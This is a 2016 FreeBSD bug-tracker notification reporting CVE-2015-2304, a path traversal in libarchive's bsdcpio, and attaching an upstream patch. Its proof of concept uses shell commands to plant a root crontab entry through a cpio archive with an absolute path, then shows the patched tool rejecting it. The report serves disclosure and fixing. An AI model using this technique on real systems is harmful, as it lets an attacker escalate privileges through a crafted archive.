[Bug 206386] vendor/libarchive: directory traversal vulnerability/local denial of services
bugzilla-noreply at freebsd.org
bugzilla-noreply at freebsd.org
Mon Jan 18 23:57:27 UTC 2016
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=206386
Bug ID: 206386
Summary: vendor/libarchive: directory traversal
vulnerability/local denial of services
Product: Base System
Version: 11.0-CURRENT
Hardware: Any
OS: Any
Status: New
Keywords: patch, security
Severity: Affects Many People
Priority: ---
Component: bin
Assignee: freebsd-bugs at FreeBSD.org
Reporter: junovitch at freebsd.org
CC: secteam at FreeBSD.org
Flags: mfc-stable9?, mfc-stable10?
Created attachment 165785
--> https://bugs.freebsd.org/bugzilla/attachment.cgi?id=165785&action=edit
vendor/libarchive/dist: Apply CVE-2015-2304 patch
Affects: All supported versions of FreeBSD
CVE Name: CVE-2015-2304
Problem Description:
Absolute path traversal vulnerability in bsdcpio in libarchive 3.1.2 and
earlier allows remote attackers to write to arbitrary files via a full pathname
in an archive.
Impact:
The issue could be exploited to write arbitrary files as the user invoking cpio
against a specially crafted cpio archive, which would be leveraged to obtain
elevated privileges.
Workaround
No workaround is available, but systems where a privileged user does not
make use of cpio archives without proper validation are not affected.
References:
- https://github.com/libarchive/libarchive/pull/110
- https://github.com/libarchive/libarchive/commit/5935715
- http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2304
COMMIT LOG FOR ATTACHED PATCH:
Apply upstream changeset 5935715:
Add ARCHIVE_EXTRACT_SECURE_NOABSOLUTEPATHS option
This fixes a directory traversal in the cpio tool.
PR: XXXXXX
Security: CVE-2015-2304
Note: I would be more then glad to commit the patch with an 'Approved by' for
src and MFV from head/contrib/libarchive with svn merge -c rXXXXXX
^/vendor/libarchive/dist .
EXAMPLE BEFORE:
##### Generate something for the Proof of concept
# echo '*/1 * * * * echo "Do something evil" > /etc/evil.txt' >
/var/cron/tabs/root
##### Package it up
# echo '/var/cron/tabs/root' | cpio -ov > test.cpio
##### Clean up
# rm /var/cron/tabs/root
##### Show it's not there yet
# cat /etc/evil.txt
cat: /etc/evil.txt: No such file or directory
##### Unpackage our "trojaned" file
# cpio -iv < test.cpio
/var/cron/tabs/root
1 block
##### Show it's in place
# cat /var/cron/tabs/root
*/1 * * * * echo "Do something evil" > /etc/evil.txt
##### Since this didn't update spool dir mtime, be impatient and restart cron
to see the impact
# service cron restart
# cat /etc/evil.txt
Do something evil
EXAMPLE AFTER:
##### Unpackage our "trojaned" file
# /usr/local/bin/bsdcpio -iv < test.cpio
/var/cron/tabs/root
/var/cron/tabs/root: Path is absolute
1 block
##### Show it's in place
# cat /var/cron/tabs/root
cat: /var/cron/tabs/root: No such file or directory
Note, /usr/local/bin/bsdcpio is the patched variant I just committed with the
same patch in ports (https://svnweb.FreeBSD.org/changeset/ports/406624).
--
You are receiving this mail because:
You are the assignee for the bug.
More information about the freebsd-bugs
mailing list